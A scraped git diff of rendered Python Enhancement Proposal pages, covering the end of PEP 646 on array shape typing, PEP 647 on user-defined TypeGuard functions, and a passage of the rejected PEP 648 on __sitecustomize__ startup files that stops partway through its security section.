To give this PEP additional context for those particularly interested in the +array typing use case, in this appendix we expand on the different ways +this PEP can be used for specifying shape-based subtypes.

+
+

Use Case 1: Specifying Shape Values

+

The simplest way to parameterise array types is using Literal +type parameters - e.g. Array[Literal[64], Literal[64]].

+

We can attach names to each parameter using normal type variables:

+
K = TypeVar('K')
+N = TypeVar('N')
+
+def matrix_vector_multiply(x: Array[K, N], y: Array[N]) -> Array[K]: ...
+
+a: Array[Literal[64], Literal[32]]
+b: Array[Literal[32]]
+matrix_vector_multiply(a, b)
+# Result is Array[Literal[64]]
+
+
+

Note that such names have a purely local scope. That is, the name +K is bound to Literal[64] only within matrix_vector_multiply. To put it another +way, there’s no relationship between the value of K in different +signatures. This is important: it would be inconvenient if every axis named K +were constrained to have the same value throughout the entire program.

+

The disadvantage of this approach is that we have no ability to enforce shape semantics across +different calls. For example, we can’t address the problem mentioned in Motivation: if +one function returns an array with leading dimensions ‘Time × Batch’, and another function +takes the same array assuming leading dimensions ‘Batch × Time’, we have no way of detecting this.

+

The main advantage is that in some cases, axis sizes really are what we care about. This is true +both for simple linear algebra operations such as the matrix manipulations above and for more +complicated transformations such as convolutional layers in neural networks, where it would be of +great utility to the programmer to be able to inspect the array size after each layer using +static analysis. To aid this, in the future we would like to explore possibilities for additional +type operators that enable arithmetic on array shapes - for example:

+
def repeat_each_element(x: Array[N]) -> Array[Mul[2, N]]: ...
+
+
+

Such arithmetic type operators would only make sense if names such as N refer to axis size.

+
+
+

Use Case 2: Specifying Shape Semantics

+

A second approach (the one that most of the examples in this PEP are based around) +is to forgo annotation with actual axis size, and instead annotate axis type.

+

This would enable us to solve the problem of enforcing shape properties across calls. +For example:

+
# lib.py
+
+class Batch: pass
+class Time: pass
+
+def make_array() -> Array[Batch, Time]: ...
+
+# user.py
+
+from lib import Batch, Time
+
+# `Batch` and `Time` have the same identity as in `lib`,
+# so must take array as produced by `lib.make_array`
+def use_array(x: Array[Batch, Time]): ...
+
+
+

Note that in this case, names are global (to the extent that we use the +same Batch type in different places). However, because names refer only +to axis types, this doesn’t constrain the value of certain axes to be +the same throughout (that is, this doesn’t constrain all axes named Height +to have a value of, say, 480 throughout).

+

The argument for this approach is that in many cases, axis type is the more +important thing to verify; we care more about which axis is which than what the +specific size of each axis is.

+

It also does not preclude cases where we wish to describe shape transformations +without knowing the type ahead of time. For example, we can still write:

+
K = TypeVar('K')
+N = TypeVar('N')
+
+def matrix_vector_multiply(x: Array[K, N], y: Array[N]) -> Array[K]: ...
+
+
+

We can then use this with:

+
class Batch: pass
+class Values: pass
+
+batch_of_values: Array[Batch, Values]
+value_weights: Array[Values]
+matrix_vector_multiply(batch_of_values, value_weights)
+# Result is Array[Batch]
+
+
+

The disadvantages are the inverse of the advantages from use case 1. +In particular, this approach does not lend itself well to arithmetic +on axis types: Mul[2, Batch] would be as meaningless as 2 * int.

+
+
+

Discussion

+

Note that use cases 1 and 2 are mutually exclusive in user code. Users +can verify size or semantic type but not both.

+

As of this PEP, we are agnostic about which approach will provide most benefit. +Since the features introduced in this PEP are compatible with both approaches, however, +we leave the door open.

+
+
+

Why Not Both?

+

Consider the following ‘normal’ code:

+
def f(x: int): ...
+
+
+

Note that we have symbols for both the value of the thing (x) and the type of +the thing (int). Why can’t we do the same with axes? For example, with an imaginary +syntax, we could write:

+
def f(array: Array[TimeValue: TimeType]): ...
+
+
+

This would allow us to access the axis size (say, 32) through the symbol TimeValue +and the type through the symbol TimeType.

+

This might even be possible using existing syntax, through a second level of parameterisation:

+
+def f(array: Array[TimeValue[TimeType]]): ...
+
+
+

However, we leave exploration of this approach to the future.

+
+
+
+

Appendix B: Shaped Types vs Named Axes

+

An issue related to those addressed by this PEP concerns +axis selection. For example, if we have an image stored in an array of shape 64×64×3, +we might wish to convert to black-and-white by computing the mean over the third +axis, mean(image, axis=2). Unfortunately, the simple typo axis=1 is +difficult to spot and will produce a result that means something completely different +(all while likely allowing the program to keep on running, resulting in a bug +that is serious but silent).

+
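A small runnable illustration of this failure mode, assuming NumPy is installed:

import numpy as np

image = np.zeros((64, 64, 3))
grey = image.mean(axis=2)      # intended: average over channels, giving shape (64, 64)
oops = image.mean(axis=1)      # typo: averages over width instead, giving shape (64, 3)
print(grey.shape, oops.shape)  # both lines run without error: the bug is silent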

In response, some libraries have implemented so-called ‘named tensors’ (in this context, +‘tensor’ is synonymous with ‘array’), in which axes are selected not by index but by +label - e.g. mean(image, axis='channels').

+

A question we are often asked about this PEP is: why not just use named tensors? +The answer is that we consider the named tensors approach insufficient, for two main reasons:

+
    +
  • Static checking of shape correctness is not possible. As mentioned in Motivation, +this is a highly desirable feature in machine learning code where iteration times +are slow by default.
  • +
  • Interface documentation is still not possible with this approach. If a function should +only be willing to take array arguments that have image-like shapes, this cannot be stipulated +with named tensors.
  • +
+

Additionally, there’s the issue of poor uptake. At the time of writing, named tensors +have only been implemented in a small number of numerical computing libraries. Possible explanations for this +include difficulty of implementation (the whole API must be modified to allow selection by axis name +instead of index), and lack of usefulness due to the fact that axis ordering conventions are often +strong enough that axis names provide little benefit (e.g. when working with images, 3D tensors are +basically always height × width × channels). However, ultimately we are still uncertain +why this is the case.

+

Can the named tensors approach be combined with the approach we advocate for in +this PEP? We’re not sure. One area of overlap is that in some contexts, we could do, say:

+
Image: Array[Height, Width, Channels]
+im: Image
+mean(im, axis=Image.axes.index(Channels))
+
+
+

Ideally, we might write something like im: Array[Height=64, Width=64, Channels=3] - +but this won’t be possible in the short term, due to the rejection of PEP 637. +In any case, our attitude towards this is mostly “Wait and see what happens before +taking any further steps”.

+
+
+

Footnotes

+ +
+
+

Endorsements

+

Variadic generics have a wide range of uses. For the fraction of that range +involving numerical computing, how likely is it that relevant libraries will +actually make use of the features proposed in this PEP?

+

We reached out to a number of people with this question, and received the +following endorsements.

+

From Stephan Hoyer, member of the NumPy Steering Council: +[14]

+
+
I just wanted to thank Matthew & Pradeep for writing this PEP and for +clarifications to the broader context of PEP 646 for array typing in +https://github.com/python/peps/pull/1904.

As someone who is heavily involved in the Python numerical computing +community (e.g., NumPy, JAX, Xarray), but who is not so familiar with the +details of Python’s type system, it is reassuring to see that a broad range +of use-cases related to type checking of named axes & shapes have been +considered, and could build upon the infrastructure in this PEP.

+

Type checking for shapes is something the NumPy community is very +interested in – there are more thumbs up on the relevant issue on NumPy’s +GitHub than any others (https://github.com/numpy/numpy/issues/7370) and we +recently added a “typing” module that is under active development.

+

It will certainly require experimentation to figure out the best ways to +use type checking for ndarrays, but this PEP looks like an excellent +foundation for such work.

+
+

From Bas van Beek, who has worked on preliminary support for +shape-generics in NumPy:

+
+
I very much share Stephan’s opinion here and look forward to integrating the +new PEP 646 variadics into numpy.

In the context of numpy (and tensor typing in general): the typing of array +shapes is a fairly complicated subject and the introduction of variadics +will likely play a big role in laying its foundation, as it allows for the +expression of both dimensionality as well as basic shape manipulation.

+

All in all, I’m very interested in where both PEP 646 and future PEPs will +take us and look forward to further developments.

+
+

From Dan Moldovan, a Senior Software Engineer on the TensorFlow Dev Team +and author of the TensorFlow RFC, TensorFlow Canonical Type System: [15]

+
+
I’d be interested in using the mechanisms defined in this PEP to define +rank-generic Tensor types in TensorFlow, which are important in specifying +tf.function signatures in a Pythonic way, using type annotations (rather +than the custom input_signature mechanism we have today - see this +issue: https://github.com/tensorflow/tensorflow/issues/31579). Variadic +generics are among the last few missing pieces to create an elegant set of +type definitions for tensors and shapes.
+

(For the sake of transparency - we also reached out to folks from a third popular +numerical computing library, PyTorch, but did not receive a statement of +endorsement from them. Our understanding is that although they are interested +in some of the same issues - e.g. static shape inference - they are currently +focusing on enabling this through a DSL rather than the Python type system.)

+
+
+

Acknowledgements

+

Thank you to Alfonso Castaño, Antoine Pitrou, Bas v.B., David Foster, Dimitris Vardoulakis, Eric Traut, Guido van Rossum, Jia Chen, +Lucio Fernandez-Arjona, Nikita Sobolev, Peilonrayz, Rebecca Chen, +Sergei Lebedev, and Vladimir Mikulik for helpful feedback and suggestions on +drafts of this PEP.

+

Thank you especially to Lucio for suggesting the star syntax (which has made multiple aspects of this proposal much more concise and intuitive), and to Stephan Hoyer and Dan Moldovan for their endorsements.

+
+
+

Resources

+

Discussions on variadic generics in Python started in 2016 with Issue 193 +on the python/typing GitHub repository [4].

+

Inspired by this discussion, Ivan Levkivskyi made a concrete proposal +at PyCon 2019, summarised in notes on ‘Type system improvements’ [5] +and ‘Static typing of Python numeric stack’ [6].

+

Expanding on these ideas, Mark Mendoza and Vincent Siles gave a presentation on +‘Variadic Type Variables for Decorators and Tensors’ [8] at the 2019 Python +Typing Summit.

+

Discussion over how type substitution in generic aliases should behave +took place in cpython#91162.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0646.rst

+

Last modified: 2024-06-27 00:41:45 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0647/index.html b/pep-0647/index.html new file mode 100644 index 00000000000..d8fc06b9aca --- /dev/null +++ b/pep-0647/index.html @@ -0,0 +1,463 @@ + PEP 647 – User-Defined Type Guards | peps.python.org +
+
+


+ + +
+
+
+

PEP 647 – User-Defined Type Guards

+
+
Author:
+
Eric Traut <erictr at microsoft.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
07-Oct-2020
+
Python-Version:
+
3.10
+
Post-History:
+
28-Dec-2020, 09-Apr-2021
+
Resolution:
+
Python-Dev thread
+
+
+
+
+
+

Attention

+

This PEP is a historical document: see TypeGuard and +typing.TypeGuard for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP specifies a way for programs to influence conditional type narrowing +employed by a type checker based on runtime checks.

+
+
+

Motivation

+

Static type checkers commonly employ a technique called “type narrowing” to +determine a more precise type of an expression within a program’s code flow. +When type narrowing is applied within a block of code based on a conditional +code flow statement (such as if and while statements), the conditional +expression is sometimes referred to as a “type guard”. Python type checkers +typically support various forms of type guard expressions.

+
def func(val: Optional[str]):
+    # "is None" type guard
+    if val is not None:
+        # Type of val is narrowed to str
+        ...
+    else:
+        # Type of val is narrowed to None
+        ...
+
+def func(val: Optional[str]):
+    # Truthy type guard
+    if val:
+        # Type of val is narrowed to str
+        ...
+    else:
+        # Type of val remains Optional[str]
+        ...
+
+def func(val: Union[str, float]):
+    # "isinstance" type guard
+    if isinstance(val, str):
+        # Type of val is narrowed to str
+        ...
+    else:
+        # Type of val is narrowed to float
+        ...
+
+def func(val: Literal[1, 2]):
+    # Comparison type guard
+    if val == 1:
+        # Type of val is narrowed to Literal[1]
+        ...
+    else:
+        # Type of val is narrowed to Literal[2]
+        ...
+
+
+

There are cases where type narrowing cannot be applied based on static +information only. Consider the following example:

+
def is_str_list(val: List[object]) -> bool:
+    """Determines whether all objects in the list are strings"""
+    return all(isinstance(x, str) for x in val)
+
+def func1(val: List[object]):
+    if is_str_list(val):
+        print(" ".join(val)) # Error: invalid type
+
+
+

This code is correct, but a type checker will report a type error because +the value val passed to the join method is understood to be of type +List[object]. The type checker does not have enough information to +statically verify that the type of val is List[str] at this point.

+

This PEP introduces a way for a function like is_str_list to be defined as +a “user-defined type guard”. This allows code to extend the type guards that +are supported by type checkers.

+

Using this new mechanism, the is_str_list function in the above example +would be modified slightly. Its return type would be changed from bool +to TypeGuard[List[str]]. This promises not merely that the return value +is a bool, but that a return value of True indicates the input to the function was of the +specified type.

+
from typing import TypeGuard
+
+def is_str_list(val: List[object]) -> TypeGuard[List[str]]:
+    """Determines whether all objects in the list are strings"""
+    return all(isinstance(x, str) for x in val)
+
+
+

User-defined type guards can also be used to determine whether a dictionary +conforms to the type requirements of a TypedDict.

+
class Person(TypedDict):
+    name: str
+    age: int
+
+def is_person(val: dict) -> "TypeGuard[Person]":
+    try:
+        return isinstance(val["name"], str) and isinstance(val["age"], int)
+    except KeyError:
+        return False
+
+def print_age(val: dict):
+    if is_person(val):
+        print(f"Age: {val['age']}")
+    else:
+        print("Not a person!")
+
+
+
+
+

Specification

+
+

TypeGuard Type

+

This PEP introduces the symbol TypeGuard exported from the typing +module. TypeGuard is a special form that accepts a single type argument. +It is used to annotate the return type of a user-defined type guard function. +Return statements within a type guard function should return bool values, +and type checkers should verify that all return paths return a bool.

+

In all other respects, TypeGuard is a distinct type from bool. It is not a +subtype of bool. Therefore, Callable[..., TypeGuard[int]] is not assignable +to Callable[..., bool].

+

When TypeGuard is used to annotate the return type of a function or +method that accepts at least one parameter, that function or method is +treated by type checkers as a user-defined type guard. The type argument +provided for TypeGuard indicates the type that has been validated by +the function.

+

User-defined type guards can be generic functions, as shown in this example:

+
_T = TypeVar("_T")
+
+def is_two_element_tuple(val: Tuple[_T, ...]) -> TypeGuard[Tuple[_T, _T]]:
+    return len(val) == 2
+
+def func(names: Tuple[str, ...]):
+    if is_two_element_tuple(names):
+        reveal_type(names)  # Tuple[str, str]
+    else:
+        reveal_type(names)  # Tuple[str, ...]
+
+
+

Type checkers should assume that type narrowing should be applied to the +expression that is passed as the first positional argument to a user-defined +type guard. If the type guard function accepts more than one argument, no +type narrowing is applied to those additional argument expressions.

+

If a type guard function is implemented as an instance method or class method, +the first positional argument maps to the second parameter (after “self” or +“cls”).

+
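As a sketch of the method case (the class and function names are ours; TypeGuard is available from typing on Python 3.10+):

from typing import List, TypeGuard

class Validator:
    def is_str_list(self, val: List[object]) -> TypeGuard[List[str]]:
        # Narrowing applies to val, the first parameter after self.
        return all(isinstance(x, str) for x in val)

def greet(v: Validator, items: List[object]) -> None:
    if v.is_str_list(items):
        print(" ".join(items))  # items is narrowed to List[str] here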

Here are some examples of user-defined type guard functions that accept more +than one argument:

+
def is_str_list(val: List[object], allow_empty: bool) -> TypeGuard[List[str]]:
+    if len(val) == 0:
+        return allow_empty
+    return all(isinstance(x, str) for x in val)
+
+_T = TypeVar("_T")
+
+def is_set_of(val: Set[Any], type: Type[_T]) -> TypeGuard[Set[_T]]:
+    return all(isinstance(x, type) for x in val)
+
+
+

The return type of a user-defined type guard function will normally refer to +a type that is strictly “narrower” than the type of the first argument (that +is, it’s a more specific type that can be assigned to the more general type). +However, it is not required that the return type be strictly narrower. This +allows for cases like the example above where List[str] is not assignable +to List[object].

+

When a conditional statement includes a call to a user-defined type guard +function, and that function returns true, the expression passed as the first +positional argument to the type guard function should be assumed by a static +type checker to take on the type specified in the TypeGuard return type, +unless and until it is further narrowed within the conditional code block.

+

Some built-in type guards provide narrowing for both positive and negative +tests (in both the if and else clauses). For example, consider the +type guard for an expression of the form x is None. If x has a type that +is a union of None and some other type, it will be narrowed to None in the +positive case and the other type in the negative case. User-defined type +guards apply narrowing only in the positive case (the if clause). The type +is not narrowed in the negative case.

+
OneOrTwoStrs = Union[Tuple[str], Tuple[str, str]]
+def func(val: OneOrTwoStrs):
+    if is_two_element_tuple(val):
+        reveal_type(val)  # Tuple[str, str]
+        ...
+    else:
+        reveal_type(val)   # OneOrTwoStrs
+        ...
+
+    if not is_two_element_tuple(val):
+        reveal_type(val)   # OneOrTwoStrs
+        ...
+    else:
+        reveal_type(val)  # Tuple[str, str]
+        ...
+
+
+
+
+
+

Backwards Compatibility

+

Existing code that does not use this new functionality will be unaffected.

+

Notably, code which uses annotations in a manner incompatible with the +stdlib typing library should simply not import TypeGuard.

+
+
+

Reference Implementation

+

The Pyright type checker supports the behavior described in this PEP.

+
+
+

Rejected Ideas

+
+

Decorator Syntax

+

The use of a decorator was considered for defining type guards.

+
@type_guard(List[str])
+def is_str_list(val: List[object]) -> bool: ...
+
+
+

The decorator approach is inferior because it requires runtime evaluation of +the type, precluding forward references. The proposed approach was also deemed +to be easier to understand and simpler to implement.

+
+
+

Enforcing Strict Narrowing

+

Strict type narrowing enforcement (requiring that the type specified +in the TypeGuard type argument is a narrower form of the type specified +for the first parameter) was considered, but this eliminates valuable +use cases for this functionality. For instance, the is_str_list example +above would be considered invalid because, due to invariance rules, +List[str] is not a subtype of List[object].

+

One variation that was considered was to require a strict narrowing requirement +by default but allow the type guard function to specify some flag to +indicate that it is not following this requirement. This was rejected because +it was deemed cumbersome and unnecessary.

+

Another consideration was to define some less-strict check that ensures that +there is some overlap between the value type and the narrowed type specified +in the TypeGuard. The problem with this proposal is that the rules for type +compatibility are already very complex when considering unions, protocols, +type variables, generics, etc. Defining a variant of these rules that relaxes +some of these constraints just for the purpose of this feature would require +that we articulate all of the subtle ways in which the rules differ and under +what specific circumstances the constraints are relaxed. For this reason, +it was decided to omit all checks.

+

It was noted that without enforcing strict narrowing, it would be possible to +break type safety. A poorly-written type guard function could produce unsafe or +even nonsensical results. For example:

+
def f(value: int) -> TypeGuard[str]:
+    return True
+
+
+

However, there are many ways a determined or uninformed developer can subvert +type safety – most commonly by using cast or Any. If a Python +developer takes the time to learn about and implement user-defined +type guards within their code, it is safe to assume that they are interested +in type safety and will not write their type guard functions in a way that will +undermine type safety or produce nonsensical results.

+
+
+

Conditionally Applying TypeGuard Type

+

It was suggested that the expression passed as the first argument to a type +guard function should retain its existing type if the type of the expression was +a proper subtype of the type specified in the TypeGuard return type. +For example, if the type guard function is def f(value: object) -> +TypeGuard[float] and the expression passed to this function is of type +int, it would retain the int type rather than take on the +float type indicated by the TypeGuard return type. This proposal was +rejected because it added complexity, inconsistency, and opened up additional +questions about the proper behavior if the type of the expression was of +composite types like unions or type variables with multiple constraints. It was +decided that the added complexity and inconsistency was not justified given +that it would provide little or no added value.

+
+
+

Narrowing of Arbitrary Parameters

+

TypeScript’s formulation of user-defined type guards allows for any input +parameter to be used as the value tested for narrowing. The TypeScript language +authors could not recall any real-world examples in TypeScript where the +parameter being tested was not the first parameter. For this reason, it was +decided unnecessary to burden the Python implementation of user-defined type +guards with additional complexity to support a contrived use case. If such +use cases are identified in the future, there are ways the TypeGuard mechanism +could be extended. This could involve the use of keyword indexing, as proposed +in PEP 637.

+
+
+

Narrowing of Implicit “self” and “cls” Parameters

+

The proposal states that the first positional argument is assumed to be the +value that is tested for narrowing. If the type guard function is implemented +as an instance or class method, an implicit self or cls argument will +also be passed to the function. A concern was raised that there may be +cases where it is desired to apply the narrowing logic on self and cls. +This is an unusual use case, and accommodating it would significantly +complicate the implementation of user-defined type guards. It was therefore +decided that no special provision would be made for it. If narrowing +of self or cls is required, the value can be passed as an explicit +argument to a type guard function.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0647.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0648/index.html b/pep-0648/index.html new file mode 100644 index 00000000000..6b24d680da9 --- /dev/null +++ b/pep-0648/index.html @@ -0,0 +1,703 @@ + PEP 648 – Extensible customizations of the interpreter at startup | peps.python.org +
+
+


+ + +
+
+
+

PEP 648 – Extensible customizations of the interpreter at startup

+
+
Author:
+
Mario Corchero <mariocj89 at gmail.com>
+
Sponsor:
+
Pablo Galindo
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-Dec-2020
+
Python-Version:
+
3.11
+
Post-History:
+
16-Dec-2020, 18-Dec-2020
+
+
+
+
+
+

Abstract

+

This PEP proposes supporting extensible customization of the interpreter by +allowing users to install files that will be executed at startup.

+
+
+

PEP Rejection

+

PEP 648 was rejected by the steering council +as it has a limited number of use cases and further complicates the startup sequence.

+
+
+

Motivation

+

System administrators, tools that repackage the interpreter and some +libraries need to customize aspects of the interpreter at startup time.

+

This is usually achieved via sitecustomize.py for system administrators +whilst libraries rely on exploiting pth files. This PEP proposes a way of +achieving the same functionality in a more user-friendly and structured way.

+
+

Limitations of pth files

+

If a library needs to perform any customization before an import or that +relates to the general working of the interpreter, it often relies on the +fact that pth files, which are loaded at startup and implemented via the +site module [7], can include Python code that will be executed when the +pth file is evaluated.

+

Note that pth files were originally developed to just add additional +directories to sys.path, but they may also contain lines which start +with “import”, which will be passed to exec(). Users have exploited this +feature to allow the customizations that they needed. See setuptools +[4] or betterexceptions [5] as examples.

+
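For instance, a library might ship a pth file along these lines (the package and hook names here are hypothetical):

# mypackage.pth, installed into site-packages.
# The single line below starts with "import", so it is executed at startup:
import mypackage._hook; mypackage._hook.install()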

Using pth files for this purpose is far from ideal for library developers, +as they need to inject code into a single line preceded by an import, making +it rather unreadable. Library developers following that practice will usually +create a module that performs all actions on import, as done by +betterexceptions [5], but the approach is still not really +user friendly.

+

Additionally, it is also non-ideal for users of the interpreter if they want +to inspect what is being executed at Python startup as they need to review +all the pth files for potential code execution which can be spread across +all site paths. Most of those pth files will be “legitimate” pth +files that just modify the path, making the question of “what is changing +my interpreter at startup” a rather complex one to answer.

+

Lastly, there have been multiple suggestions for removing code execution from +pth files, see [1] and [2].

+
+
+

Limitations of sitecustomize.py

+

Whilst sitecustomize is an acceptable solution, it assumes a single person is +in charge of the system and the interpreter. If both the system administrator +and the person responsible for provisioning the interpreter want to add +customizations at the interpreter startup they need to agree on the contents +of the file and combine all the changes. This is not a major limitation +though, and it is not the main driver of this change. Should the change +happen, it will also improve the situation for these users, as rather than +having a sitecustomize.py which performs all those actions, they can have +custom isolated files named after the features they want to enhance. As an +example, Ubuntu could change their current sitecustomize.py to just be +ubuntu_apport_python_hook. This not only better represents its intent but +also gives users of the interpreter a better understanding of the +modifications happening on their interpreter.

+
+
+
+

Rationale

+

This PEP proposes supporting extensible customization of the interpreter at +startup by executing all files discovered in directories named +__sitecustomize__ in sitepackages [8] or +usersitepackages [9] at startup time.

+
+

Why __sitecustomize__

+

The name aims to follow the already existing concept of sitecustomize.py. +As the directory will be within sys.path, given that it is located in +site paths, we choose to use double underscores around its name, to prevent +colliding with the already existing sitecustomize.py.

+
+
+

Discovering the new __sitecustomize__ directories

+

The Python interpreter will look at startup for a directory named +__sitecustomize__ within any of the standard site-packages paths.

+

These are commonly the Python system location and the user location, but are +ultimately defined by the site module logic.

+

Users can use site.sitepackages [8] and +site.usersitepackages [9] to know the paths where +the interpreter can discover __sitecustomize__ directories.

+
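For example, the locations that would be searched can be listed with the existing site module helpers (site.getsitepackages() and site.getusersitepackages() in today’s standard library):

import site

for path in site.getsitepackages() + [site.getusersitepackages()]:
    print(path)  # a __sitecustomize__ directory would be discovered here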
+
+

Time of __sitecustomize__ discovery

+

The __sitecustomize__ directories will be discovered immediately after pth +files are discovered in a site-packages path, as part of site.addsitedir +[10].

+

This is repeated for each site-packages path, in the exact same order +that is being followed today for pth files.

+
+
+

Order of execution within __sitecustomize__

+

The implementation will execute the files within __sitecustomize__ by +sorting them by name when discovering each of the __sitecustomize__ +directories. We discourage users from relying on the order of execution, though.

+

We considered executing them in random order, but that could result in +different results depending on how the interpreter chooses to pick up those +files. So even if it won’t be a good practice to rely on other files being +executed, we think that is better than having randomly different results on +interpreter startup. We chose to run the files after the pth files in +case a user needs to add items to the path before running a file.

+
+
+

Interaction with pth files

+

pth files can be used to add paths into sys.path, but this should not +affect the __sitecustomize__ discovery process, as those directories are +looked up exclusively in site-packages paths.

+
+
+

Execution of files within __sitecustomize__

+

When a __sitecustomize__ directory is discovered, all of the files that +have a .py extension within it will be read with io.open_code and +executed by using exec [11].

+

An empty dictionary will be passed as globals to the exec function +to prevent unexpected interactions between different files.

+
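Putting the pieces together, the discovery and execution logic would behave roughly like the following sketch (illustrative only, not the actual implementation):

import io
import os

def exec_sitecustomize_dir(sitedir):
    # Execute all .py files in sitedir/__sitecustomize__, sorted by name.
    custom_dir = os.path.join(sitedir, '__sitecustomize__')
    if not os.path.isdir(custom_dir):
        return
    for name in sorted(os.listdir(custom_dir)):
        if name.endswith('.py'):
            path = os.path.join(custom_dir, name)
            with io.open_code(path) as f:
                source = f.read()
            exec(compile(source, path, 'exec'), {})  # fresh, empty globals per file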
+
+

Failure handling

+

Any error during the execution of any of the files will not be logged unless the +interpreter is run in verbose mode, and will not stop the evaluation of +other files. The user will receive a message in stderr saying that the file +failed to be executed and that verbose mode can be used to get more +information. This behaviour mimics the one existing for sitecustomize.py.

+
+
+

Interaction with virtual environments

+

The customizations applied to an interpreter via the new +__sitecustomize__ solution will continue to work when a user creates a +virtual environment, the same way that sitecustomize.py +interacts with virtual environments.

+

This is a difference when compared to pth files, which are not propagated +into virtual environments unless include-system-site-packages is enabled.

+

If library maintainers have features installed via __sitecustomize__ that +they do not want to propagate into virtual environments, they should detect +if they are running within a virtual environment by checking sys.prefix == +sys.base_prefix. This behavior is similar to packages that modify the global +sitecustomize.py.

+
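A minimal sketch of that check, for a __sitecustomize__ file that should not apply inside virtual environments:

import sys

def running_in_virtualenv() -> bool:
    return sys.prefix != sys.base_prefix

if not running_in_virtualenv():
    ...  # perform the customization only for the base interpreter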
+
+

Interaction with sitecustomize.py and usercustomize.py

+

Until removed, sitecustomize and usercustomize will be executed after +__sitecustomize__ similar to pth files. See the Backward compatibility +section for information on removal plans for sitecustomize and +usercustomize.

+
+
+

Identifying all installed files

+

To facilitate debugging of the Python startup, if the site module is invoked +it will print the __sitecustomize__ directories that will be discovered +on startup.

+
+
+

Files naming convention

+

Packages will be encouraged to include the name of the package within the +name of the file to avoid collisions between packages. But the only +requirement on the filename is that it ends in .py for the interpreter to +execute them.

+
+
+

Disabling start files

+

In some scenarios, like when the startup time is key, it might be desired to +disable this option altogether. The already existing flag -S [3] +will disable all site-related manipulation, including this new feature. +If the flag is passed in, __sitecustomize__ directories will not be +discovered.

+

Additionally, to allow for starting the interpreter disabling only this new +feature a new option will be added under -X: disablesitecustomize, +which will disable the discovery of __sitecustomize__ exclusively.

+

Lastly, the user can disable the discovery of __sitecustomize__ +directories only in the user site by disabling the user site via any of the +multiple options in the site.py module.

+
+
+

Support in build backends

+

Whilst build backends can choose to provide an option to facilitate the +installation of these files into a __sitecustomize__ directory, this +PEP does not address that directly. Similar to pth files, build backends +can choose to not provide an easy-to-configure mechanism for +__sitecustomize__ files and let users hook into the installation +process to include such files. We do not consider enhanced build backend +support a requirement for this PEP.

+
+
+

Impact on startup time

+

A concern in this implementation is how Python interpreter startup time can +be affected by this addition. We expect the performance impact to be highly +coupled to the logic in the files that a user or sysadmin installs in the +Python environment being tested.

+

If the interpreter has any files in their __sitecustomize__ directory, +the file execution time plus a call reading the code will be added to the +startup time. This is similar to how code execution is impacting startup time +through sitecustomize.py, usercustomize.py and code in pth files. +We will therefore focus here on comparing this solution against those three, +as otherwise the actual time added to startup is highly dependent on the code +that is being executed in those files.

+

Results were gathered by running “./python.exe -c pass” with perf on 50 +iterations, repeating the command 50 times on each iteration and getting the +geometric mean of all the results. The file used to run those benchmarks is +checked in to the reference implementation [6].

+

The benchmark was run with 3.10 alpha 7 compiled with PGO and LTO with the +following parameters and system state:

+
    +
  • Perf event: Max sample rate set to 1 per second
  • +
  • CPU Frequency: Minimum frequency of CPU 17,35 set to the maximum frequency
  • +
  • Turbo Boost (MSR): Turbo Boost disabled on CPU 17: MSR 0x1a0 set to 0x4000850089
  • +
  • IRQ affinity: Set default affinity to CPU 0-16,18-34
  • +
  • IRQ affinity: Set affinity of IRQ 1,3-16,21,25-31,56-59,68-85,87,89-90,92-93,95-104 to CPU 0-16,18-34
  • +
  • CPU: use 2 logical CPUs: 17,35
  • +
  • Perf event: Maximum sample rate: 1 per second
  • +
  • ASLR: Full randomization
  • +
  • Linux scheduler: Isolated CPUs (2/36): 17,35
  • +
  • Linux scheduler: RCU disabled on CPUs (2/36): 17,35
  • +
  • CPU Frequency: 0-16,18-34=min=1200 MHz, max=3600 MHz; 17,35=min=max=3600 MHz
  • +
  • Turbo Boost (MSR): CPU 17,35: disabled
  • +
+

The code placed to be executed in pth files, sitecustomize.py, +usercustomize.py and files within __sitecustomize__ is the following:

+
+
import time; x = time.time() ** 5
+

The file is aimed at executing a simple operation whose cost is still expected to be +negligible. This is to put the experiment in a situation where any performance hit due +to the mechanism is made visible whilst still keeping it relatively realistic. +Additionally, it starts with an import and fits on a single line, so that it can also +be used in pth files.

(columns 2-5 give the number of files in each location; times in microseconds)

Test  sitecustomize.py  usercustomize.py  pth  __sitecustomize__   Run 1   Run 2
1     0                 0                 0    Dir not created     13884   13897
2     0                 0                 0    0                   13871   13818
3     0                 0                 1    0                   13964   13924
4     0                 0                 0    1                   13940   13939
5     1                 1                 0    0                   13990   13993
6     0                 0                 0    2 (system + user)   14063   14040
7     0                 0                 50   0                   16011   16014
8     0                 0                 0    50                  15456   15448
+

Results can be reproduced with run-benchmark.py script provided in the +reference implementation [6].

+

We interpret the following from these results:

+
    +
  • Using two __sitecustomize__ scripts compared to sitecustomize.py +and usercustomize.py slows down the interpreter by 0.3%. We expect this +slowdown until sitecustomize.py and usercustomize.py are removed in +a future release as even if the user does not create the files, the +interpreter will still attempt to import them.
  • +
  • With the arbitrary 50 pth files with code tested, moving those to +__sitecustomize__ produces a speedup of ~3.5% in startup, which is likely +related to the simpler logic used to evaluate __sitecustomize__ files compared +to pth file execution.
  • +
  • In general all measurements show that there is a low impact on startup time +with this addition.
  • +
+
+
+

Audit Event

+

A new audit event will be added and triggered on __sitecustomize__ +execution to facilitate security inspection by calling sys.audit +[12] with “sitecustomize.exec_file” as name and the filename as +argument.

+
+
+

Security implications

+

This PEP aims to move all code execution from pth files to files within a +__sitecustomize__ directory. We think this is an improvement for system admins +for the following reasons:

+
    +
  • Allows them to quickly identify the code being executed at startup time by the +interpreter by looking into a single directory rather than having to scan +all pth files.
  • +
  • Allows them to track usage of this feature through the new proposed audit event.
  • +
  • Gives finer-grained control by allowing permissions to be tuned on the +__sitecustomize__ directory, potentially allowing users to install only +packages that do not change the interpreter startup.
  • +
+

